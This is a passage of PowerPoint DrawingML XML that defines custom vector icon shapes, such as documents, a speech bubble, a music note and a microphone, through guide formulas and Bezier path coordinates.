                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="160" y="76"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="76"/>
                    <a:pt x="111" y="76"/>
                    <a:pt x="111" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="76"/>
                    <a:pt x="104" y="73"/>
                    <a:pt x="104" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="65"/>
                    <a:pt x="107" y="63"/>
                    <a:pt x="111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4" y="63"/>
                    <a:pt x="167" y="65"/>
                    <a:pt x="167" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="73"/>
                    <a:pt x="164" y="76"/>
                    <a:pt x="16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90">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01ACED6A-E3D9-40B1-9146-BEE1BBF718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0009264">
              <a:off x="5961723" y="5065555"/>
              <a:ext cx="676275" cy="752475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 160 w 180"/>
                <a:gd name="T1" fmla="*/ 200 h 200"/>
                <a:gd name="T2" fmla="*/ 52 w 180"/>
                <a:gd name="T3" fmla="*/ 200 h 200"/>
                <a:gd name="T4" fmla="*/ 32 w 180"/>
                <a:gd name="T5" fmla="*/ 180 h 200"/>
                <a:gd name="T6" fmla="*/ 32 w 180"/>
                <a:gd name="T7" fmla="*/ 48 h 200"/>
                <a:gd name="T8" fmla="*/ 52 w 180"/>
                <a:gd name="T9" fmla="*/ 28 h 200"/>
                <a:gd name="T10" fmla="*/ 160 w 180"/>
                <a:gd name="T11" fmla="*/ 28 h 200"/>
                <a:gd name="T12" fmla="*/ 180 w 180"/>
                <a:gd name="T13" fmla="*/ 48 h 200"/>
                <a:gd name="T14" fmla="*/ 180 w 180"/>
                <a:gd name="T15" fmla="*/ 180 h 200"/>
                <a:gd name="T16" fmla="*/ 160 w 180"/>
                <a:gd name="T17" fmla="*/ 200 h 200"/>
                <a:gd name="T18" fmla="*/ 168 w 180"/>
                <a:gd name="T19" fmla="*/ 40 h 200"/>
                <a:gd name="T20" fmla="*/ 44 w 180"/>
                <a:gd name="T21" fmla="*/ 40 h 200"/>
                <a:gd name="T22" fmla="*/ 44 w 180"/>
                <a:gd name="T23" fmla="*/ 172 h 200"/>
                <a:gd name="T24" fmla="*/ 168 w 180"/>
                <a:gd name="T25" fmla="*/ 172 h 200"/>
                <a:gd name="T26" fmla="*/ 168 w 180"/>
                <a:gd name="T27" fmla="*/ 40 h 200"/>
                <a:gd name="T28" fmla="*/ 136 w 180"/>
                <a:gd name="T29" fmla="*/ 15 h 200"/>
                <a:gd name="T30" fmla="*/ 148 w 180"/>
                <a:gd name="T31" fmla="*/ 15 h 200"/>
                <a:gd name="T32" fmla="*/ 148 w 180"/>
                <a:gd name="T33" fmla="*/ 24 h 200"/>
                <a:gd name="T34" fmla="*/ 136 w 180"/>
                <a:gd name="T35" fmla="*/ 24 h 200"/>
                <a:gd name="T36" fmla="*/ 136 w 180"/>
                <a:gd name="T37" fmla="*/ 15 h 200"/>
                <a:gd name="T38" fmla="*/ 136 w 180"/>
                <a:gd name="T39" fmla="*/ 12 h 200"/>
                <a:gd name="T40" fmla="*/ 12 w 180"/>
                <a:gd name="T41" fmla="*/ 12 h 200"/>
                <a:gd name="T42" fmla="*/ 12 w 180"/>
                <a:gd name="T43" fmla="*/ 144 h 200"/>
                <a:gd name="T44" fmla="*/ 16 w 180"/>
                <a:gd name="T45" fmla="*/ 144 h 200"/>
                <a:gd name="T46" fmla="*/ 20 w 180"/>
                <a:gd name="T47" fmla="*/ 144 h 200"/>
                <a:gd name="T48" fmla="*/ 28 w 180"/>
                <a:gd name="T49" fmla="*/ 144 h 200"/>
                <a:gd name="T50" fmla="*/ 28 w 180"/>
                <a:gd name="T51" fmla="*/ 172 h 200"/>
                <a:gd name="T52" fmla="*/ 16 w 180"/>
                <a:gd name="T53" fmla="*/ 172 h 200"/>
                <a:gd name="T54" fmla="*/ 16 w 180"/>
                <a:gd name="T55" fmla="*/ 171 h 200"/>
                <a:gd name="T56" fmla="*/ 0 w 180"/>
                <a:gd name="T57" fmla="*/ 152 h 200"/>
                <a:gd name="T58" fmla="*/ 0 w 180"/>
                <a:gd name="T59" fmla="*/ 20 h 200"/>
                <a:gd name="T60" fmla="*/ 20 w 180"/>
                <a:gd name="T61" fmla="*/ 0 h 200"/>
                <a:gd name="T62" fmla="*/ 128 w 180"/>
                <a:gd name="T63" fmla="*/ 0 h 200"/>
                <a:gd name="T64" fmla="*/ 147 w 180"/>
                <a:gd name="T65" fmla="*/ 15 h 200"/>
                <a:gd name="T66" fmla="*/ 136 w 180"/>
                <a:gd name="T67" fmla="*/ 15 h 200"/>
                <a:gd name="T68" fmla="*/ 136 w 180"/>
                <a:gd name="T69" fmla="*/ 1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200">
                  <a:moveTo>
                    <a:pt x="160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40" y="200"/>
                    <a:pt x="32" y="191"/>
                    <a:pt x="32" y="180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37"/>
                    <a:pt x="40" y="28"/>
                    <a:pt x="52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71" y="28"/>
                    <a:pt x="180" y="37"/>
                    <a:pt x="180" y="48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80" y="191"/>
                    <a:pt x="171" y="200"/>
                    <a:pt x="160" y="200"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="168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168" y="172"/>
                    <a:pt x="168" y="172"/>
                    <a:pt x="168" y="172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="40"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="136" y="15"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="15"/>
                    <a:pt x="148" y="15"/>
                    <a:pt x="148" y="1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36" y="24"/>
                    <a:pt x="136" y="24"/>
                    <a:pt x="136" y="24"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136" y="15"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="136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6" y="169"/>
                    <a:pt x="0" y="161"/>
                    <a:pt x="0" y="15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7" y="0"/>
                    <a:pt x="145" y="6"/>
                    <a:pt x="147" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="15"/>
                    <a:pt x="136" y="15"/>
                    <a:pt x="136" y="15"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13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91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DDA1368-7828-4EF8-BE63-4B91129101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847450">
              <a:off x="9102181" y="4506643"/>
              <a:ext cx="1026145" cy="965401"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 180 w 200"/>
                <a:gd name="T1" fmla="*/ 152 h 188"/>
                <a:gd name="T2" fmla="*/ 163 w 200"/>
                <a:gd name="T3" fmla="*/ 152 h 188"/>
                <a:gd name="T4" fmla="*/ 138 w 200"/>
                <a:gd name="T5" fmla="*/ 188 h 188"/>
                <a:gd name="T6" fmla="*/ 114 w 200"/>
                <a:gd name="T7" fmla="*/ 152 h 188"/>
                <a:gd name="T8" fmla="*/ 20 w 200"/>
                <a:gd name="T9" fmla="*/ 152 h 188"/>
                <a:gd name="T10" fmla="*/ 0 w 200"/>
                <a:gd name="T11" fmla="*/ 132 h 188"/>
                <a:gd name="T12" fmla="*/ 0 w 200"/>
                <a:gd name="T13" fmla="*/ 20 h 188"/>
                <a:gd name="T14" fmla="*/ 20 w 200"/>
                <a:gd name="T15" fmla="*/ 0 h 188"/>
                <a:gd name="T16" fmla="*/ 180 w 200"/>
                <a:gd name="T17" fmla="*/ 0 h 188"/>
                <a:gd name="T18" fmla="*/ 200 w 200"/>
                <a:gd name="T19" fmla="*/ 20 h 188"/>
                <a:gd name="T20" fmla="*/ 200 w 200"/>
                <a:gd name="T21" fmla="*/ 132 h 188"/>
                <a:gd name="T22" fmla="*/ 180 w 200"/>
                <a:gd name="T23" fmla="*/ 152 h 188"/>
                <a:gd name="T24" fmla="*/ 43 w 200"/>
                <a:gd name="T25" fmla="*/ 60 h 188"/>
                <a:gd name="T26" fmla="*/ 24 w 200"/>
                <a:gd name="T27" fmla="*/ 78 h 188"/>
                <a:gd name="T28" fmla="*/ 43 w 200"/>
                <a:gd name="T29" fmla="*/ 97 h 188"/>
                <a:gd name="T30" fmla="*/ 61 w 200"/>
                <a:gd name="T31" fmla="*/ 78 h 188"/>
                <a:gd name="T32" fmla="*/ 43 w 200"/>
                <a:gd name="T33" fmla="*/ 60 h 188"/>
                <a:gd name="T34" fmla="*/ 99 w 200"/>
                <a:gd name="T35" fmla="*/ 60 h 188"/>
                <a:gd name="T36" fmla="*/ 80 w 200"/>
                <a:gd name="T37" fmla="*/ 78 h 188"/>
                <a:gd name="T38" fmla="*/ 99 w 200"/>
                <a:gd name="T39" fmla="*/ 97 h 188"/>
                <a:gd name="T40" fmla="*/ 117 w 200"/>
                <a:gd name="T41" fmla="*/ 78 h 188"/>
                <a:gd name="T42" fmla="*/ 99 w 200"/>
                <a:gd name="T43" fmla="*/ 60 h 188"/>
                <a:gd name="T44" fmla="*/ 155 w 200"/>
                <a:gd name="T45" fmla="*/ 60 h 188"/>
                <a:gd name="T46" fmla="*/ 136 w 200"/>
                <a:gd name="T47" fmla="*/ 78 h 188"/>
                <a:gd name="T48" fmla="*/ 155 w 200"/>
                <a:gd name="T49" fmla="*/ 97 h 188"/>
                <a:gd name="T50" fmla="*/ 173 w 200"/>
                <a:gd name="T51" fmla="*/ 78 h 188"/>
                <a:gd name="T52" fmla="*/ 155 w 200"/>
                <a:gd name="T53" fmla="*/ 6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88">
                  <a:moveTo>
                    <a:pt x="180" y="152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8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32"/>
                    <a:pt x="200" y="132"/>
                    <a:pt x="200" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="143"/>
                    <a:pt x="191" y="152"/>
                    <a:pt x="180" y="152"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="43" y="60"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="60"/>
                    <a:pt x="24" y="68"/>
                    <a:pt x="24" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="88"/>
                    <a:pt x="33" y="97"/>
                    <a:pt x="43" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="97"/>
                    <a:pt x="61" y="88"/>
                    <a:pt x="61" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="68"/>
                    <a:pt x="53" y="60"/>
                    <a:pt x="43" y="60"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="99" y="60"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="60"/>
                    <a:pt x="80" y="68"/>
                    <a:pt x="80" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="88"/>
                    <a:pt x="89" y="97"/>
                    <a:pt x="99" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="97"/>
                    <a:pt x="117" y="88"/>
                    <a:pt x="117" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="68"/>
                    <a:pt x="109" y="60"/>
                    <a:pt x="99" y="60"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="155" y="60"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="60"/>
                    <a:pt x="136" y="68"/>
                    <a:pt x="136" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="88"/>
                    <a:pt x="145" y="97"/>
                    <a:pt x="155" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="97"/>
                    <a:pt x="173" y="88"/>
                    <a:pt x="173" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="68"/>
                    <a:pt x="165" y="60"/>
                    <a:pt x="155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92">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A1D154C-552E-4A20-BBB3-45F082D4EE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4729" y="3037079"/>
              <a:ext cx="508000" cy="782638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 79 w 135"/>
                <a:gd name="T1" fmla="*/ 0 h 208"/>
                <a:gd name="T2" fmla="*/ 60 w 135"/>
                <a:gd name="T3" fmla="*/ 0 h 208"/>
                <a:gd name="T4" fmla="*/ 60 w 135"/>
                <a:gd name="T5" fmla="*/ 141 h 208"/>
                <a:gd name="T6" fmla="*/ 2 w 135"/>
                <a:gd name="T7" fmla="*/ 168 h 208"/>
                <a:gd name="T8" fmla="*/ 7 w 135"/>
                <a:gd name="T9" fmla="*/ 188 h 208"/>
                <a:gd name="T10" fmla="*/ 80 w 135"/>
                <a:gd name="T11" fmla="*/ 176 h 208"/>
                <a:gd name="T12" fmla="*/ 88 w 135"/>
                <a:gd name="T13" fmla="*/ 136 h 208"/>
                <a:gd name="T14" fmla="*/ 88 w 135"/>
                <a:gd name="T15" fmla="*/ 51 h 208"/>
                <a:gd name="T16" fmla="*/ 114 w 135"/>
                <a:gd name="T17" fmla="*/ 81 h 208"/>
                <a:gd name="T18" fmla="*/ 110 w 135"/>
                <a:gd name="T19" fmla="*/ 112 h 208"/>
                <a:gd name="T20" fmla="*/ 108 w 135"/>
                <a:gd name="T21" fmla="*/ 118 h 208"/>
                <a:gd name="T22" fmla="*/ 122 w 135"/>
                <a:gd name="T23" fmla="*/ 107 h 208"/>
                <a:gd name="T24" fmla="*/ 127 w 135"/>
                <a:gd name="T25" fmla="*/ 90 h 208"/>
                <a:gd name="T26" fmla="*/ 79 w 135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208">
                  <a:moveTo>
                    <a:pt x="7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34" y="130"/>
                    <a:pt x="7" y="145"/>
                    <a:pt x="2" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="176"/>
                    <a:pt x="4" y="184"/>
                    <a:pt x="7" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="208"/>
                    <a:pt x="63" y="199"/>
                    <a:pt x="80" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="166"/>
                    <a:pt x="88" y="158"/>
                    <a:pt x="88" y="13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8" y="59"/>
                    <a:pt x="110" y="66"/>
                    <a:pt x="114" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="90"/>
                    <a:pt x="113" y="104"/>
                    <a:pt x="110" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="114"/>
                    <a:pt x="107" y="116"/>
                    <a:pt x="108" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="124"/>
                    <a:pt x="119" y="112"/>
                    <a:pt x="122" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="102"/>
                    <a:pt x="126" y="95"/>
                    <a:pt x="127" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="41"/>
                    <a:pt x="84" y="38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94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58689F9F-CAA3-4940-A3DF-3B05CA9ACB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75795" y="4753204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95">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{593B0905-1C74-4779-BCF3-C6AA5CAA8A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3027353">
              <a:off x="4701560" y="3325485"/>
              <a:ext cx="466725" cy="752475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 70 w 124"/>
                <a:gd name="T1" fmla="*/ 160 h 200"/>
                <a:gd name="T2" fmla="*/ 70 w 124"/>
                <a:gd name="T3" fmla="*/ 184 h 200"/>
                <a:gd name="T4" fmla="*/ 97 w 124"/>
                <a:gd name="T5" fmla="*/ 184 h 200"/>
                <a:gd name="T6" fmla="*/ 97 w 124"/>
                <a:gd name="T7" fmla="*/ 200 h 200"/>
                <a:gd name="T8" fmla="*/ 25 w 124"/>
                <a:gd name="T9" fmla="*/ 200 h 200"/>
                <a:gd name="T10" fmla="*/ 25 w 124"/>
                <a:gd name="T11" fmla="*/ 184 h 200"/>
                <a:gd name="T12" fmla="*/ 53 w 124"/>
                <a:gd name="T13" fmla="*/ 184 h 200"/>
                <a:gd name="T14" fmla="*/ 53 w 124"/>
                <a:gd name="T15" fmla="*/ 160 h 200"/>
                <a:gd name="T16" fmla="*/ 0 w 124"/>
                <a:gd name="T17" fmla="*/ 98 h 200"/>
                <a:gd name="T18" fmla="*/ 0 w 124"/>
                <a:gd name="T19" fmla="*/ 76 h 200"/>
                <a:gd name="T20" fmla="*/ 17 w 124"/>
                <a:gd name="T21" fmla="*/ 76 h 200"/>
                <a:gd name="T22" fmla="*/ 17 w 124"/>
                <a:gd name="T23" fmla="*/ 98 h 200"/>
                <a:gd name="T24" fmla="*/ 30 w 124"/>
                <a:gd name="T25" fmla="*/ 130 h 200"/>
                <a:gd name="T26" fmla="*/ 62 w 124"/>
                <a:gd name="T27" fmla="*/ 144 h 200"/>
                <a:gd name="T28" fmla="*/ 94 w 124"/>
                <a:gd name="T29" fmla="*/ 130 h 200"/>
                <a:gd name="T30" fmla="*/ 105 w 124"/>
                <a:gd name="T31" fmla="*/ 98 h 200"/>
                <a:gd name="T32" fmla="*/ 105 w 124"/>
                <a:gd name="T33" fmla="*/ 76 h 200"/>
                <a:gd name="T34" fmla="*/ 124 w 124"/>
                <a:gd name="T35" fmla="*/ 76 h 200"/>
                <a:gd name="T36" fmla="*/ 124 w 124"/>
                <a:gd name="T37" fmla="*/ 98 h 200"/>
                <a:gd name="T38" fmla="*/ 70 w 124"/>
                <a:gd name="T39" fmla="*/ 160 h 200"/>
                <a:gd name="T40" fmla="*/ 63 w 124"/>
                <a:gd name="T41" fmla="*/ 132 h 200"/>
                <a:gd name="T42" fmla="*/ 29 w 124"/>
                <a:gd name="T43" fmla="*/ 97 h 200"/>
                <a:gd name="T44" fmla="*/ 29 w 124"/>
                <a:gd name="T45" fmla="*/ 88 h 200"/>
                <a:gd name="T46" fmla="*/ 77 w 124"/>
                <a:gd name="T47" fmla="*/ 88 h 200"/>
                <a:gd name="T48" fmla="*/ 77 w 124"/>
                <a:gd name="T49" fmla="*/ 80 h 200"/>
                <a:gd name="T50" fmla="*/ 29 w 124"/>
                <a:gd name="T51" fmla="*/ 80 h 200"/>
                <a:gd name="T52" fmla="*/ 29 w 124"/>
                <a:gd name="T53" fmla="*/ 64 h 200"/>
                <a:gd name="T54" fmla="*/ 77 w 124"/>
                <a:gd name="T55" fmla="*/ 64 h 200"/>
                <a:gd name="T56" fmla="*/ 77 w 124"/>
                <a:gd name="T57" fmla="*/ 56 h 200"/>
                <a:gd name="T58" fmla="*/ 29 w 124"/>
                <a:gd name="T59" fmla="*/ 56 h 200"/>
                <a:gd name="T60" fmla="*/ 29 w 124"/>
                <a:gd name="T61" fmla="*/ 44 h 200"/>
                <a:gd name="T62" fmla="*/ 77 w 124"/>
                <a:gd name="T63" fmla="*/ 44 h 200"/>
                <a:gd name="T64" fmla="*/ 77 w 124"/>
                <a:gd name="T65" fmla="*/ 36 h 200"/>
                <a:gd name="T66" fmla="*/ 29 w 124"/>
                <a:gd name="T67" fmla="*/ 36 h 200"/>
                <a:gd name="T68" fmla="*/ 63 w 124"/>
                <a:gd name="T69" fmla="*/ 0 h 200"/>
                <a:gd name="T70" fmla="*/ 97 w 124"/>
                <a:gd name="T71" fmla="*/ 36 h 200"/>
                <a:gd name="T72" fmla="*/ 97 w 124"/>
                <a:gd name="T73" fmla="*/ 97 h 200"/>
                <a:gd name="T74" fmla="*/ 63 w 124"/>
                <a:gd name="T75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200">
                  <a:moveTo>
                    <a:pt x="70" y="160"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="184"/>
                    <a:pt x="70" y="184"/>
                    <a:pt x="70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7" y="200"/>
                    <a:pt x="97" y="200"/>
                    <a:pt x="97" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="200"/>
                    <a:pt x="25" y="200"/>
                    <a:pt x="25" y="200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23" y="156"/>
                    <a:pt x="0" y="130"/>
                    <a:pt x="0" y="9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1"/>
                    <a:pt x="22" y="122"/>
                    <a:pt x="30" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="139"/>
                    <a:pt x="49" y="144"/>
                    <a:pt x="62" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="144"/>
                    <a:pt x="86" y="139"/>
                    <a:pt x="94" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="122"/>
                    <a:pt x="105" y="111"/>
                    <a:pt x="105" y="98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130"/>
                    <a:pt x="100" y="156"/>
                    <a:pt x="70" y="160"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="63" y="132"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="132"/>
                    <a:pt x="29" y="116"/>
                    <a:pt x="29" y="97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17"/>
                    <a:pt x="46" y="0"/>
                    <a:pt x="63" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="0"/>
                    <a:pt x="97" y="16"/>
                    <a:pt x="97" y="36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116"/>
                    <a:pt x="82" y="132"/>
                    <a:pt x="63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C231B3A8-7579-4BA0-A369-A9AEB0BF0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45294">
              <a:off x="5837983" y="4025925"/>
              <a:ext cx="800036" cy="801727"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 176 w 200"/>
                <a:gd name="T1" fmla="*/ 0 h 200"/>
                <a:gd name="T2" fmla="*/ 24 w 200"/>
                <a:gd name="T3" fmla="*/ 0 h 200"/>
                <a:gd name="T4" fmla="*/ 0 w 200"/>
                <a:gd name="T5" fmla="*/ 24 h 200"/>
                <a:gd name="T6" fmla="*/ 0 w 200"/>
                <a:gd name="T7" fmla="*/ 200 h 200"/>
                <a:gd name="T8" fmla="*/ 200 w 200"/>
                <a:gd name="T9" fmla="*/ 200 h 200"/>
                <a:gd name="T10" fmla="*/ 200 w 200"/>
                <a:gd name="T11" fmla="*/ 24 h 200"/>
                <a:gd name="T12" fmla="*/ 176 w 200"/>
                <a:gd name="T13" fmla="*/ 0 h 200"/>
                <a:gd name="T14" fmla="*/ 116 w 200"/>
                <a:gd name="T15" fmla="*/ 16 h 200"/>
                <a:gd name="T16" fmla="*/ 128 w 200"/>
                <a:gd name="T17" fmla="*/ 28 h 200"/>
                <a:gd name="T18" fmla="*/ 116 w 200"/>
                <a:gd name="T19" fmla="*/ 40 h 200"/>
                <a:gd name="T20" fmla="*/ 104 w 200"/>
                <a:gd name="T21" fmla="*/ 28 h 200"/>
                <a:gd name="T22" fmla="*/ 116 w 200"/>
                <a:gd name="T23" fmla="*/ 16 h 200"/>
                <a:gd name="T24" fmla="*/ 76 w 200"/>
                <a:gd name="T25" fmla="*/ 16 h 200"/>
                <a:gd name="T26" fmla="*/ 88 w 200"/>
                <a:gd name="T27" fmla="*/ 28 h 200"/>
                <a:gd name="T28" fmla="*/ 76 w 200"/>
                <a:gd name="T29" fmla="*/ 40 h 200"/>
                <a:gd name="T30" fmla="*/ 64 w 200"/>
                <a:gd name="T31" fmla="*/ 28 h 200"/>
                <a:gd name="T32" fmla="*/ 76 w 200"/>
                <a:gd name="T33" fmla="*/ 16 h 200"/>
                <a:gd name="T34" fmla="*/ 36 w 200"/>
                <a:gd name="T35" fmla="*/ 16 h 200"/>
                <a:gd name="T36" fmla="*/ 48 w 200"/>
                <a:gd name="T37" fmla="*/ 28 h 200"/>
                <a:gd name="T38" fmla="*/ 36 w 200"/>
                <a:gd name="T39" fmla="*/ 40 h 200"/>
                <a:gd name="T40" fmla="*/ 24 w 200"/>
                <a:gd name="T41" fmla="*/ 28 h 200"/>
                <a:gd name="T42" fmla="*/ 36 w 200"/>
                <a:gd name="T43" fmla="*/ 16 h 200"/>
                <a:gd name="T44" fmla="*/ 184 w 200"/>
                <a:gd name="T45" fmla="*/ 184 h 200"/>
                <a:gd name="T46" fmla="*/ 16 w 200"/>
                <a:gd name="T47" fmla="*/ 184 h 200"/>
                <a:gd name="T48" fmla="*/ 16 w 200"/>
                <a:gd name="T49" fmla="*/ 56 h 200"/>
                <a:gd name="T50" fmla="*/ 184 w 200"/>
                <a:gd name="T51" fmla="*/ 56 h 200"/>
                <a:gd name="T52" fmla="*/ 184 w 200"/>
                <a:gd name="T53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200">
                  <a:moveTo>
                    <a:pt x="17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200" y="11"/>
                    <a:pt x="189" y="0"/>
                    <a:pt x="176" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="16"/>
                    <a:pt x="128" y="22"/>
                    <a:pt x="128" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="35"/>
                    <a:pt x="123" y="40"/>
                    <a:pt x="116" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="40"/>
                    <a:pt x="104" y="35"/>
                    <a:pt x="104" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="22"/>
                    <a:pt x="110" y="16"/>
                    <a:pt x="116" y="16"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="76" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="16"/>
                    <a:pt x="88" y="22"/>
                    <a:pt x="88" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="35"/>
                    <a:pt x="83" y="40"/>
                    <a:pt x="76" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="40"/>
                    <a:pt x="64" y="35"/>
                    <a:pt x="64" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="22"/>
                    <a:pt x="70" y="16"/>
                    <a:pt x="76" y="16"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="16"/>
                    <a:pt x="48" y="22"/>
                    <a:pt x="48" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="35"/>
                    <a:pt x="43" y="40"/>
                    <a:pt x="36" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="40"/>
                    <a:pt x="24" y="35"/>
                    <a:pt x="24" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="22"/>
                    <a:pt x="30" y="16"/>
                    <a:pt x="36" y="16"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="184" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="184"/>
                    <a:pt x="16" y="184"/>
                    <a:pt x="16" y="184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84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108">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F82FA4D7-F725-43B5-827A-5C67EC24FE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655417">
              <a:off x="-24404" y="4398739"/>
              <a:ext cx="720725" cy="7080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110">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C1597A1-9ECC-443A-A3DF-923501E32E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200010">
              <a:off x="1099703" y="3104802"/>
              <a:ext cx="750888" cy="738188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 69 w 473"/>
                <a:gd name="T1" fmla="*/ 181 h 465"/>
                <a:gd name="T2" fmla="*/ 10 w 473"/>
                <a:gd name="T3" fmla="*/ 121 h 465"/>
                <a:gd name="T4" fmla="*/ 10 w 473"/>
                <a:gd name="T5" fmla="*/ 240 h 465"/>
                <a:gd name="T6" fmla="*/ 69 w 473"/>
                <a:gd name="T7" fmla="*/ 181 h 465"/>
                <a:gd name="T8" fmla="*/ 464 w 473"/>
                <a:gd name="T9" fmla="*/ 98 h 465"/>
